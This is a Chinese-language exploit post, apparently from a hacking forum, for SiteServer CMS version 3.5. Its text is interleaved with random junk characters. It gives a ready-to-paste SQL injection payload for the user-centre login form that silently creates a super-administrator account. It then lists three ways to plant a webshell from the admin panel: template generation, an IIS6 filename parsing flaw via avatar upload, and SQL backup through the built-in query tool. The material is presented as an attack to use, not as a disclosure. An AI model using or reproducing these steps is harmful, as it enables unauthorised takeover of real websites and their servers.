经测试秒杀最新的3.5版
, `$ p+ C1 F$ i6 F1 p# T1 j8 _0 g4 ^+ c
stieserver官网:www.siteserver.cn
; L* P, i) E; _9 G, N# ]7 |! P( b! s, C& S" @. }
/ C- J" k% e# o3 k0 m
3 ^' p3 Y3 w1 q1 e3 F' ]EXP:) b6 v% l5 x% o, z" s0 E
, F. Y1 ~: V+ k6 }. k& K1 r- h
直接访问UserCenter/login.aspx
- {5 P) o7 V. Z1 A
, ~& h" e' }$ L* B 8 B C: \: w( E( ^. W( F% h ^
* V+ K# F" ~" s9 C+ q4 |
用户名处输入:
" G5 u, H- f4 H) w
?8 V3 m# S! A. Y123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
6 n9 s; d/ @. c. J1 N9 t3 [. Q: Q* s# k
, Y. n% n7 N5 {- u8 x. p
' Q$ o* p1 k y8 O; \密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。, m4 O2 u- B- V9 E" Z! z$ H) }
% F# ~* y5 N$ z
$ P( c4 N, K! |4 \4 z! b& ~9 s. U, s, S# Z, B# ?/ @3 Q
之后再访问后台SiteServer/login.aspx用插入的用户登陆! m7 l# a( ?- \- C! C
) t$ W: |5 K- M, f9 j. i
$ a0 P1 m4 [ b, b' T8 I$ T8 `
8 e) D' M% J3 y; V# }: ~后台拿webshell的三种方法:
% W- f$ {6 N# |6 N; I
* E( A4 e: `0 J一、! S% n' h5 Q4 u3 ?! x
" ~' y6 b# p* E9 O. ]! \: [
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
" T5 ?9 B$ ~2 W! t! y! E' @0 D- w3 t. P$ b; A( u6 I: ^$ F" t
二、7 @+ u7 Y9 z/ h% S7 i- C& d
% W( w& ~/ Z& _' R, X1 X- B6 S
成员权限-》添加用户-》用户名为:1.asp
4 g! z3 p) `1 R, t9 \7 a: ?( H8 Y8 z1 e' \: H8 b, A/ i
http://127.0.0.1/usercenter/
" b! C b5 R5 F% W
: v; \) K1 b# K0 v( C用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell% n( W% v2 ], \" Z% L+ Q) D' T9 l, |
2 Z* Q% { o; _% |( O$ G
(ps:后台添加用户时不会验证是否含有非法字符); R) z- m" Y& S& l7 b
9 L+ H! ?3 k8 y0 s \三、5 B# R1 p" F1 c9 N, J( J1 f
$ D. G6 i2 Y, {+ [
系统工具-》实用工具-》机器参数查看& X7 m0 o; f; Q2 j% f
可以看到数据库类型、名称,WEB路径1 U" x' h3 y' W6 v0 J$ h( I* W# Y
, ]0 p7 A! J3 b( [系统工具-》数据库工具-》SQL语句查询
. s) w; Z3 v, ^( i这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。4 Q* `4 ]' E# X1 ?% j1 ~$ f; ^
; z% @1 p( k! V0 w" \- s |